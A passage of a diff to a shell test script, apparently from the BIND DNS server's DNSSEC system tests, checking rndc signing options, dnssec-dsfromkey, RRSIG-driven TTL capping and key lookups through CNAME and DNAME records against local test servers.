+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param' without additional arguments is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param none' without zone is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param none > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param 1' without additional arguments is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param 1 0' without additional arguments is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 0 > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param 1 0 0' without additional arguments is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 0 0 > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param 1 0 0 -' without zone is handled ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 0 0 - > /dev/null 2>&1 && ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param' works with salt ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 0 0 ffff inline.example > /dev/null 2>&1 || ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+for i in 1 2 3 4 5 6 7 8 9 10 ; do
+ salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}')
+ if [ "$salt" = "FFFF" ]; then
+ break;
+ fi
+ echo_i "sleeping ...."
+ sleep 1
+done;
+[ "$salt" = "FFFF" ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param' works without salt ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 0 0 - inline.example > /dev/null 2>&1 || ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+for i in 1 2 3 4 5 6 7 8 9 10 ; do
+ salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}')
+ if [ "$salt" = "-" ]; then
+ break;
+ fi
+ echo_i "sleeping ...."
+ sleep 1
+done;
+[ "$salt" = "-" ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param' works with 'auto' as salt ($n)"
+ret=0
+rndccmd 10.53.0.3 signing -nsec3param 1 0 0 auto inline.example > /dev/null 2>&1 || ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+for i in 1 2 3 4 5 6 7 8 9 10 ; do
+ salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}')
+ [ -n "$salt" ] && [ "$salt" != "-" ] && break
+ echo_i "sleeping ...."
+ sleep 1
+done;
+[ "$salt" != "-" ] || ret=1
+[ "${#salt}" -eq 16 ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'rndc signing -nsec3param' with 'auto' as salt again generates a different salt ($n)"
+ret=0
+oldsalt=$salt
+rndccmd 10.53.0.3 signing -nsec3param 1 0 0 auto inline.example > /dev/null 2>&1 || ret=1
+rndccmd 10.53.0.3 status > /dev/null || ret=1
+for i in 1 2 3 4 5 6 7 8 9 10 ; do
+ salt=$(dig_with_opts +nodnssec +short nsec3param inline.example. @10.53.0.3 | awk '{print $4}')
+ [ -n "$salt" ] && [ "$salt" != "$oldsalt" ] && break
+ echo_i "sleeping ...."
+ sleep 1
+done;
+[ "$salt" != "$oldsalt" ] || ret=1
+[ "${#salt}" -eq 16 ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check rndc signing -list output ($n)"
+ret=0
+{ rndccmd 10.53.0.3 signing -list dynamic.example > signing.out; } 2>&1
+grep -q "No signing records found" signing.out || {
+ ret=1
+ sed 's/^/ns3 /' signing.out | cat_i
+}
+{ rndccmd 10.53.0.3 signing -list update-nsec3.example > signing.out; } 2>&1
+grep -q "Done signing with key .*/$DEFAULT_ALGORITHM" signing.out || {
+ ret=1
+ sed 's/^/ns3 /' signing.out | cat_i
+}
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "clear signing records ($n)"
+{ rndccmd 10.53.0.3 signing -clear all update-nsec3.example > /dev/null; } 2>&1 || ret=1
+check_no_signing_record_found() {
+ { rndccmd 10.53.0.3 signing -list update-nsec3.example > signing.out; } 2>&1
+ grep -q "No signing records found" signing.out || {
+ sed 's/^/ns3 /' signing.out | cat_i
+ return 1
+ }
+ return 0
+}
+retry_quiet 5 check_no_signing_record_found || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a insecure zone beneath a cname resolves ($n)"
+ret=0
+dig_with_opts soa insecure.below-cname.example.
@10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a secure zone beneath a cname resolves ($n)"
+ret=0
+dig_with_opts soa secure.below-cname.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+my_dig() {
+ "$DIG" +noadd +nosea +nostat +noquest +nocomm +nocmd -p "$PORT" @10.53.0.4 "$@"
+}
+
+echo_i "checking DNSKEY query with no data still gets put in cache ($n)"
+ret=0
+firstVal=$(my_dig insecure.example. dnskey| awk '$1 != ";;" { print $2 }')
+sleep 1
+secondVal=$(my_dig insecure.example. dnskey| awk '$1 != ";;" { print $2 }')
+if [ "${firstVal:-0}" -eq "${secondVal:-0}" ]
+then
+ sleep 1
+ thirdVal=$(my_dig insecure.example. dnskey|awk '$1 != ";;" { print $2 }')
+ if [ "${firstVal:-0}" -eq "${thirdVal:-0}" ]
+ then
+ echo_i "cannot confirm query answer still in cache"
+ ret=1
+ fi
+fi
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that a split dnssec dnssec-signzone work ($n)"
+ret=0
+dig_with_opts soa split-dnssec.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that a smart split dnssec dnssec-signzone work ($n)"
+ret=0
+dig_with_opts soa split-smart.example.
@10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.* ad[ ;]" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that NOTIFY is sent at the end of NSEC3 chain generation ($n)"
+ret=0
+(
+echo zone nsec3chain-test
+echo server 10.53.0.2 "$PORT"
+echo update add nsec3chain-test. 0 nsec3param 1 0 1 123456
+echo send
+) | $NSUPDATE
+for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
+do
+ dig_with_opts nsec3param nsec3chain-test @10.53.0.2 > dig.out.ns2.test$n || ret=1
+ if grep "ANSWER: 3," dig.out.ns2.test$n >/dev/null
+ then
+ break;
+ fi
+ echo_i "sleeping ...."
+ sleep 3
+done
+grep "ANSWER: 3," dig.out.ns2.test$n > /dev/null || ret=1
+if [ "$ret" -ne 0 ]; then echo_i "nsec3 chain generation not complete"; fi
+dig_with_opts +noauth +nodnssec soa nsec3chain-test @10.53.0.2 > dig.out.ns2.test$n || ret=1
+s2=$(awk '$4 == "SOA" { print $7}' dig.out.ns2.test$n)
+for i in 1 2 3 4 5 6 7 8 9 10
+do
+ dig_with_opts +noauth +nodnssec soa nsec3chain-test @10.53.0.3 > dig.out.ns3.test$n || ret=1
+ s3=$(awk '$4 == "SOA" { print $7}' dig.out.ns3.test$n)
+ test "$s2" = "$s3" && break
+ sleep 1
+done
+digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check dnssec-dsfromkey from stdin ($n)"
+ret=0
+dig_with_opts dnskey algroll. @10.53.0.2 | \
+ $DSFROMKEY -f - algroll. > dig.out.ns2.test$n || ret=1
+NF=$(awk '{print NF}' dig.out.ns2.test$n | sort -u)
+[ "${NF}" = 7 ] || ret=1
+# make canonical
+awk '{
+ for (i=1;i<7;i++) printf("%s ", $i);
+ for (i=7;i<=NF;i++) printf("%s", $i);
+ printf("\n");
+}' < dig.out.ns2.test$n > canonical1.$n || ret=1
+awk '{
+ for (i=1;i<7;i++) printf("%s ", $i);
+ for (i=7;i<=NF;i++) printf("%s", $i);
+ printf("\n");
+}' < ns1/dsset-algroll$TP > canonical2.$n || ret=1
+$DIFF -b canonical1.$n canonical2.$n > /dev/null 2>&1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Intentionally strip ".key" from keyfile name to ensure the error message
+# includes it anyway to avoid confusion (RT #21731)
+echo_i "check dnssec-dsfromkey error message when keyfile is not found ($n)"
+ret=0
+key=$($KEYGEN -a $DEFAULT_ALGORITHM -q example.) || ret=1
+mv "$key.key" "$key"
+$DSFROMKEY "$key" > dsfromkey.out.$n 2>&1 && ret=1
+grep "$key.key: file not found" dsfromkey.out.$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check dnssec-dsfromkey with revoked key ($n)"
+ret=0
+dig_with_opts revkey.example dnskey @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "DNSKEY.256 3 13" dig.out.ns4.test$n > /dev/null || ret=1 # ZSK
+grep "DNSKEY.385 3 13" dig.out.ns4.test$n > /dev/null || ret=1 # revoked KSK
+grep "DNSKEY.257 3 13" dig.out.ns4.test$n > /dev/null || ret=1 # KSK
+test $(awk '$4 == "DNSKEY" { print }' dig.out.ns4.test$n | wc -l) -eq 3 || ret=1
+$DSFROMKEY -f dig.out.ns4.test$n revkey.example. > dsfromkey.out.test$n || ret=1
+test $(wc -l < dsfromkey.out.test$n) -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+
+echo_i "testing soon-to-expire RRSIGs without a replacement private key ($n)"
+ret=0
+dig_with_answeropts +nottlid expiring.example ns @10.53.0.3 | grep RRSIG > dig.out.ns3.test$n 2>&1
+# there must be a signature here
+[ -s dig.out.ns3.test$n ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing new records are signed with 'no-resign' ($n)"
+ret=0
+(
+echo zone nosign.example
+echo server 10.53.0.3 "$PORT"
+echo update add new.nosign.example 300 in txt "hi there"
+echo send
+) | $NSUPDATE
+sleep 1
+dig_with_answeropts +nottlid txt new.nosign.example @10.53.0.3 \
+ > dig.out.ns3.test$n 2>&1
+grep RRSIG dig.out.ns3.test$n > /dev/null 2>&1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing expiring records aren't resigned with 'no-resign' ($n)"
+ret=0
+dig_with_answeropts +nottlid nosign.example ns @10.53.0.3 | \
+ grep RRSIG | sed 's/[ ][ ]*/ /g' > dig.out.ns3.test$n 2>&1
+# the NS RRSIG should not be changed
+$DIFF nosign.before dig.out.ns3.test$n > /dev/null|| ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing updates fail with no private key ($n)"
+ret=0
+rm -f ns3/Knosign.example.*.private
+(
+echo zone nosign.example
+echo server 10.53.0.3 "$PORT"
+echo update add fail.nosign.example 300 in txt "reject me"
+echo send
+) | $NSUPDATE > /dev/null 2>&1 && ret=1
+dig_with_answeropts +nottlid fail.nosign.example txt @10.53.0.3 \
+ > dig.out.ns3.test$n 2>&1
+[ -s dig.out.ns3.test$n ] && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing legacy upper case signer name validation ($n)"
+ret=0
+$DIG +tcp +noadd +noauth +dnssec -p "$PORT" soa upper.example @10.53.0.4 \
+ > dig.out.ns4.test$n 2>&1
+grep "flags:.* ad;" dig.out.ns4.test$n >
/dev/null || ret=1
+grep "RRSIG.*SOA.* UPPER\\.EXAMPLE\\. " dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing that we lower case signer name ($n)"
+ret=0
+$DIG +tcp +noadd +noauth +dnssec -p "$PORT" soa LOWER.EXAMPLE @10.53.0.4 \
+ > dig.out.ns4.test$n 2>&1
+grep "flags:.* ad;" dig.out.ns4.test$n > /dev/null || ret=1
+grep "RRSIG.*SOA.* lower\\.example\\. " dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing TTL is capped at RRSIG expiry time ($n)"
+ret=0
+rndccmd 10.53.0.3 freeze expiring.example 2>&1 | sed 's/^/ns3 /' | cat_i
+(
+cd ns3 || exit 1
+for file in K*.moved; do
+ mv "$file" "$(basename "$file" .moved)"
+done
+$SIGNER -S -N increment -e now+1mi -o expiring.example expiring.example.db > /dev/null
+) || ret=1
+rndc_reload ns3 10.53.0.3 expiring.example
+
+rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i
+dig_with_answeropts +cd expiring.example soa @10.53.0.4 > dig.out.ns4.1.$n
+dig_with_answeropts expiring.example soa @10.53.0.4 > dig.out.ns4.2.$n
+ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n)
+ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n)
+for ttl in ${ttls:-0}; do
+ [ "${ttl}" -eq 300 ] || ret=1
+done
+for ttl in ${ttls2:-0}; do
+ [ "${ttl}" -le 60 ] || ret=1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing TTL is capped at RRSIG expiry time for records in the additional section (NS) ($n)"
+ret=0
+rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i
+sleep 1
+dig_with_additionalopts +cd expiring.example ns @10.53.0.4 > dig.out.ns4.1.$n
+dig_with_additionalopts expiring.example ns @10.53.0.4 > dig.out.ns4.2.$n
+ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n)
+ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n)
+for ttl in ${ttls:-300}; do
+ [ "$ttl" -le 300 ] && [ "$ttl" -gt 240 ] || ret=1
+done
+for ttl in
${ttls2:-0}; do
+ [ "$ttl" -le 60 ] || ret=1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing TTL is capped at RRSIG expiry time for records in the additional section (MX) ($n)"
+ret=0
+rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i
+sleep 1
+dig_with_additionalopts +cd expiring.example mx @10.53.0.4 > dig.out.ns4.1.$n
+dig_with_additionalopts expiring.example mx @10.53.0.4 > dig.out.ns4.2.$n
+ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n)
+ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n)
+for ttl in ${ttls:-300}; do
+ [ "$ttl" -le 300 ] && [ "$ttl" -gt 240 ] || ret=1
+done
+for ttl in ${ttls2:-0}; do
+ [ "$ttl" -le 60 ] || ret=1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+copy_setports ns4/named3.conf.in ns4/named.conf
+rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i
+sleep 3
+
+echo_i "testing TTL of about to expire RRsets with dnssec-accept-expired yes; ($n)"
+ret=0
+rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i
+dig_with_answeropts +cd expiring.example soa @10.53.0.4 > dig.out.ns4.1.$n
+dig_with_answeropts expiring.example soa @10.53.0.4 > dig.out.ns4.2.$n
+ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n)
+ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n)
+for ttl in ${ttls:-0}; do
+ [ "$ttl" -eq 300 ] || ret=1
+done
+for ttl in ${ttls2:-0}; do
+ [ "$ttl" -eq 120 ] || ret=1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing TTL of expired RRsets with dnssec-accept-expired yes; ($n)"
+ret=0
+dig_with_answeropts +cd expired.example soa @10.53.0.4 > dig.out.ns4.1.$n
+dig_with_answeropts expired.example soa @10.53.0.4 > dig.out.ns4.2.$n
+ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n)
+ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n)
+for ttl in ${ttls:-0}; do
+ [ "$ttl" -eq 300 ] || ret=1
+done
+for ttl in ${ttls2:-0}; do
+ [ "$ttl" -eq 120 ] || ret=1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing TTL is capped at RRSIG expiry time for records in the additional section with dnssec-accept-expired yes; ($n)"
+ret=0
+rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i
+dig_with_additionalopts +cd expiring.example mx @10.53.0.4 > dig.out.ns4.1.$n
+dig_with_additionalopts expiring.example mx @10.53.0.4 > dig.out.ns4.2.$n
+ttls=$(awk '$1 != ";;" {print $2}' dig.out.ns4.1.$n)
+ttls2=$(awk '$1 != ";;" {print $2}' dig.out.ns4.2.$n)
+for ttl in ${ttls:-300}; do
+ [ "$ttl" -le 300 ] && [ "$ttl" -gt 240 ] || ret=1
+done
+for ttl in ${ttls2:-0}; do
+ [ "$ttl" -le 120 ] && [ "$ttl" -gt 60 ] || ret=1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing DNSKEY lookup via CNAME ($n)"
+ret=0
+dig_with_opts +noauth cnameandkey.secure.example. \
+ @10.53.0.3 dnskey > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth cnameandkey.secure.example. \
+ @10.53.0.4 dnskey > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "CNAME" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing KEY lookup at CNAME (present) ($n)"
+ret=0
+dig_with_opts +noauth cnameandkey.secure.example. \
+ @10.53.0.3 key > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth cnameandkey.secure.example. \
+ @10.53.0.4 key > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "CNAME" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing KEY lookup at CNAME (not present) ($n)"
+ret=0
+dig_with_opts +noauth cnamenokey.secure.example. \
+ @10.53.0.3 key > dig.out.ns3.test$n || ret=1
+dig_with_opts +noauth cnamenokey.secure.example.
\
+ @10.53.0.4 key > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "CNAME" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing DNSKEY lookup via DNAME ($n)"
+ret=0
+dig_with_opts a.dnameandkey.secure.example. \
+ @10.53.0.3 dnskey > dig.out.ns3.test$n || ret=1
+dig_with_opts a.dnameandkey.secure.example. \
+ @10.53.0.4 dnskey > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "CNAME" dig.out.ns4.test$n > /dev/null || ret=1
+grep "DNAME" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "testing KEY lookup via DNAME ($n)"
+ret=0
+dig_with_opts b.dnameandkey.secure.example. \
+ @10.53.0.3 key > dig.out.ns3.test$n || ret=1
+dig_with_opts b.dnameandkey.secure.example. \
+ @10.53.0.4 key > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "DNAME" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that named doesn't loop when all private keys are not available ($n)"
+ret=0
+lines=$(grep -c "reading private key file expiring.example" ns3/named.run || true)
+test "${lines:-1000}" -lt 15 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check against against missing nearest provable proof ($n)"
+dig_with_opts +norec b.c.d.optout-tld. \
+ @10.53.0.6 ds > dig.out.ds.ns6.test$n || ret=1
+nsec3=$(grep -c "IN.NSEC3" dig.out.ds.ns6.test$n || true)
+[ "$nsec3" -eq 2 ] || ret=1
+dig_with_opts +norec b.c.d.optout-tld.
\
+ @10.53.0.6 A > dig.out.ns6.test$n || ret=1
+nsec3=$(grep -c "IN.NSEC3" dig.out.ns6.test$n || true)
+[ "$nsec3" -eq 1 ] || ret=1
+dig_with_opts optout-tld. \
+ @10.53.0.4 SOA > dig.out.soa.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.soa.ns4.test$n > /dev/null || ret=1
+dig_with_opts b.c.d.optout-tld. \
+ @10.53.0.4 A > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that key id are logged when dumping the cache ($n)"
+ret=0
+rndc_dumpdb ns4
+grep "; key id = " ns4/named_dump.db.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check KEYDATA records are printed in human readable form in key zone ($n)"
+# force the managed-keys zone to be written out
+rndccmd 10.53.0.4 managed-keys sync 2>&1 | sed 's/^/ns4 /' | cat_i
+for i in 1 2 3 4 5 6 7 8 9
+do
+ ret=0
+ if test -f ns4/managed-keys.bind
+ then
+ grep KEYDATA ns4/managed-keys.bind > /dev/null &&
+ grep "next refresh:" ns4/managed-keys.bind > /dev/null &&
+ break
+ fi
+ ret=1
+ sleep 1
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check dig's +nocrypto flag ($n)"
+ret=0
+dig_with_opts +norec +nocrypto DNSKEY .
\
+ @10.53.0.1 > dig.out.dnskey.ns1.test$n || ret=1
+grep -E "256 [0-9]+ $DEFAULT_ALGORITHM_NUMBER \\[key id = [1-9][0-9]*]" dig.out.dnskey.ns1.test$n > /dev/null || ret=1
+grep -E "RRSIG.* \\[omitted]" dig.out.dnskey.ns1.test$n > /dev/null || ret=1
+dig_with_opts +norec +nocrypto DS example \
+ @10.53.0.1 > dig.out.ds.ns1.test$n || ret=1
+grep -E "DS.* [0-9]+ [12] \[omitted]" dig.out.ds.ns1.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check simultaneous inactivation and publishing of dnskeys removes inactive signature ($n)"
+ret=0
+cnt=0
+while :
+do
+dig_with_opts publish-inactive.example @10.53.0.3 dnskey > dig.out.ns3.test$n
+keys=$(awk '$5 == 257 { print; }' dig.out.ns3.test$n | wc -l)
+test "$keys" -gt 2 && break
+cnt=$((cnt+1))
+test "$cnt" -gt 120 && break
+sleep 1
+done
+test "$keys" -gt 2 || ret=1
+sigs=$(grep -c RRSIG dig.out.ns3.test$n || true)
+n=$((n+1))
+test "$sigs" -eq 2 || ret=1
+if test "$ret" -ne 0 ; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "check that increasing the sig-validity-interval resigning triggers re-signing ($n)"
+ret=0
+before=$($DIG axfr siginterval.example -p "$PORT" @10.53.0.3 | grep RRSIG.SOA)
+cp ns3/siginterval2.conf ns3/siginterval.conf
+rndccmd 10.53.0.3 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i
+i=10
+while [ "$i" -ge 0 ]; do
+after=$($DIG axfr siginterval.example -p "$PORT" @10.53.0.3 | grep RRSIG.SOA)
+test "$before" != "$after" && break
+sleep 1
+i=$((i-1))
+done
+n=$((n+1))
+if test "$before" = "$after" ; then echo_i "failed"; ret=1; fi
+status=$((status+ret))
+
+if [ -x "$PYTHON" ]; then
+ echo_i "check dnskey-sig-validity sets longer expiry for DNSKEY ($n)"
+ ret=0
+ rndccmd 10.53.0.3 sign siginterval.example 2>&1 | sed 's/^/ns3 /' | cat_i
+ # convert expiry date to a comma-separated list of integers python can
+ # use as input to date(). strip leading 0s in months and days so
+ # python3 will recognize them as integers.
+ $DIG +dnssec +short -p "$PORT" @10.53.0.3 soa siginterval.example > dig.out.soa.test$n
+ soaexpire=$(awk '$1 ~ /SOA/ { print $5 }' dig.out.soa.test$n |
+ sed 's/\(....\)\(..\)\(..\).*/\1, \2, \3/' |
+ sed 's/ 0/ /g')
+ $DIG +dnssec +short -p "$PORT" @10.53.0.3 dnskey siginterval.example > dig.out.dnskey.test$n
+ dnskeyexpire=$(awk '$1 ~ /DNSKEY/ { print $5; exit 0 }' dig.out.dnskey.test$n |
+ sed 's/\(....\)\(..\)\(..\).*/\1, \2, \3/' |
+ sed 's/ 0/ /g')
+ $PYTHON > python.out.$n <<EOF
+from datetime import date;
+ke=date($dnskeyexpire)
+se=date($soaexpire)
+print((ke-se).days);
+EOF
+ diff=$(cat python.out.$n)
+ [ "$diff" -ge 55 ] || ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+fi
+
+copy_setports ns4/named4.conf.in ns4/named.conf
+rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i
+sleep 3
+
+echo_i "check insecure delegation between static-stub zones ($n)"
+ret=0
+dig_with_opts ns insecure.secure.example \
+ @10.53.0.4 > dig.out.ns4.1.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.1.test$n > /dev/null && ret=1
+dig_with_opts ns secure.example \
+ @10.53.0.4 > dig.out.ns4.2.test$n || ret=1
+grep "SERVFAIL" dig.out.ns4.2.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check the acceptance of seconds as inception and expiration times ($n)"
+ret=0
